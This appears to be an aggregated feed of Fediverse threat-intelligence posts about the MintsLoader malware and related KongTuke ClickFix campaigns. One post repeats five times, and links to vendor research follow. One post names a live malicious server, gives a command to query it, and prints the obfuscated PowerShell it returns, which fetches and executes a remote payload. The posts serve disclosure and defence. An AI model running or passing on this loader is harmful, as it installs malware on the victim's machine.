#mintsloader — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #mintsloader, aggregated by home.social.
-
RE: https://infosec.exchange/@netresec/115905237000922504
This malicious finger service on
64.190.113.206(AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!You can probe it with:
nc 64.190.113.206 79 <<< rcaptchaorfinger [email protected]The malicious "finger" service now gives this response:
powershell -w h $huwcsxf='ur' ;set-alias hf7wz32e c$($huwcsxf)l;$infqtmrw=(2231,2243,2243,2239,2185,2174,2174,2237,2248,2224,2229,2243,2245,2249,2177,2173,2243,2238,2239,2174,2176,2173,2239,2231,2239,2190,2242,2188,2177,2180,2226,2179,2180,2228,2229,2228,2172,2176,2177,2225,2183,2172,2179,2228,2176,2227,2172,2225,2184,2175,2225,2172,2227,2225,2225,2224,2182,2226,2228,2227,2177,2176,2224,2226);$zpsmnihtrogcqb=('reicporet','get-cmdlet');$gsrwpaztvi=$infqtmrw;foreach($yxbwqtafvdn in $gsrwpaztvi){$ptwnmclaqfgh=$yxbwqtafvdn;$wyngvtsfirm=$wyngvtsfirm+[char]($ptwnmclaqfgh-2127);$ljfaixwhpztnkv=$wyngvtsfirm; $axfzykqljsnrwc=$ljfaixwhpztnkv};$uecbvofzghikt[2]=$axfzykqljsnrwc;$sdypqv='rl';$gkmvohls=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(hf7wz32e -useb $axfzykqljsnrwc) -
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
MintsLoader Drops GhostWeaver via Phishing, ClickFix — Uses DGA, TLS for Stealth Attacks – Source:thehackernews.com https://ciso2ciso.com/mintsloader-drops-ghostweaver-via-phishing-clickfix-uses-dga-tls-for-stealth-attacks-sourcethehackernews-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #MintsLoader
-
Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting
#MintsLoader
https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting -
MintsLoader: StealC and BOINC Delivery
#MintsLoader
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery